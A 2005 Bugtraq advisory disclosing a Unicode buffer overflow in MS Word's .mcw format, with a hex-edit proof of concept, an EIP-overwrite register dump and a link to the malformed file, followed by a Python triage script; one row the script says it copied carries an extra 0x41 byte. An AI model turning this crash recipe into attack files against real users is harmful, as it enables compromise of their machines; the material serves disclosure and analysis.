Date: 19 May 2005 23:33:34 -0000
From: Bahaa Naamneh <b_naamneh@...mail.com>
To: bugtraq@...urityfocus.com
Subject: UNICODE BUFFER OVERFLOW IN MS-WORD
UNICODE BUFFER OVERFLOW IN MS-WORD
===================================


*.mcw is the MS Word file format for Macintosh.

The Unicode buffer overflow occurs when the user opens the malformed *.mcw document.

Proof of concept:
-----------------

By modifying the *.mcw file using a binary editor as follows:

These lines were taken from the .mcw file:

------snip---mcw-file----
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00 
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
------snip---------------

Change them as follows:

c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68 
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73 
------------

EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246

------------


* The modified .mcw file can be downloaded from:
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw



---------------------
Bahaa Naamneh
b_naamneh@...mail.com
www.bsecurity.tk
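A crash-triage script, added here as an example; it is not part of the original advisory and not Microsoft code. It takes the two hex dumps and the register dump from the post above (embedded as string literals copied from the post), finds where the modified file first diverges from the original, locates the run of 0x41 filler bytes, and checks whether the EIP and EBP values in the register dump are the UTF-16LE widening of two filler bytes, which is what `EIP = 00410041` indicates. The widening model (`latin-1` decoded, then `utf-16-le` encoded) is an assumption standing in for whatever ANSI-to-Unicode conversion the parser performs; the .mcw layout itself is not parsed. Function names are the example's own.

```python
import re
import struct

# Hex dumps copied from the advisory above (original bytes, then the modified bytes).
ORIGINAL_DUMP = """
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
"""

MODIFIED_DUMP = """
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
"""

# Register dump copied from the advisory's crash output.
REGISTER_DUMP = """
EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246
"""


def parse_hex_dump(text: str) -> bytes:
    """Turn a whitespace-separated hex dump into bytes."""
    return bytes.fromhex("".join(text.split()))


def parse_registers(text: str) -> dict:
    """Parse 'NAME = HEX' pairs from a register dump into {name: int}."""
    return {name: int(value, 16)
            for name, value in re.findall(r"([A-Z]{3}) = ([0-9A-Fa-f]{8})", text)}


def common_prefix_len(a: bytes, b: bytes) -> int:
    """Offset at which two files first differ, i.e. where the modification starts."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def longest_run(data: bytes) -> tuple:
    """Return (byte_value, start_offset, length) of the longest run of one byte value."""
    best = (data[0], 0, 1)
    start = 0
    for i in range(1, len(data) + 1):
        if i == len(data) or data[i] != data[start]:
            if i - start > best[2]:
                best = (data[start], start, i - start)
            start = i
    return best


def widen(narrow: bytes) -> bytes:
    """Model the ANSI-to-UTF-16LE widening (assumption: identity mapping for ASCII bytes)."""
    return narrow.decode("latin-1").encode("utf-16-le")


def register_is_widened_filler(regs: dict, name: str, filler: int) -> bool:
    """True if the register's 4 little-endian bytes equal two filler bytes after widening."""
    return struct.pack("<I", regs[name]) == widen(bytes([filler, filler]))


def triage(original_hex: str, modified_hex: str, register_text: str) -> dict:
    """Summarise how the modified file relates to the crash registers."""
    original = parse_hex_dump(original_hex)
    modified = parse_hex_dump(modified_hex)
    regs = parse_registers(register_text)
    value, offset, length = longest_run(modified)
    return {
        "modification_offset": common_prefix_len(original, modified),
        "filler_byte": value,
        "filler_offset": offset,
        "filler_length": length,
        "eip": regs["EIP"],
        "ebp": regs["EBP"],
        "eip_from_widened_filler": register_is_widened_filler(regs, "EIP", value),
        "ebp_from_widened_filler": register_is_widened_filler(regs, "EBP", value),
    }


if __name__ == "__main__":
    for key, val in triage(ORIGINAL_DUMP, MODIFIED_DUMP, REGISTER_DUMP).items():
        shown = f"{val:#x}" if isinstance(val, int) and not isinstance(val, bool) else val
        print(f"{key}: {shown}")
```

The two widening checks are the point of the triage: a register holding `00410041` is consistent with the narrow filler `41 41` having been converted to UTF-16 before it overwrote the saved frame, so the crash is caused by the inserted bytes rather than by an unrelated fault, and the filler offset tells a patch author or a signature writer which field of the file to bound.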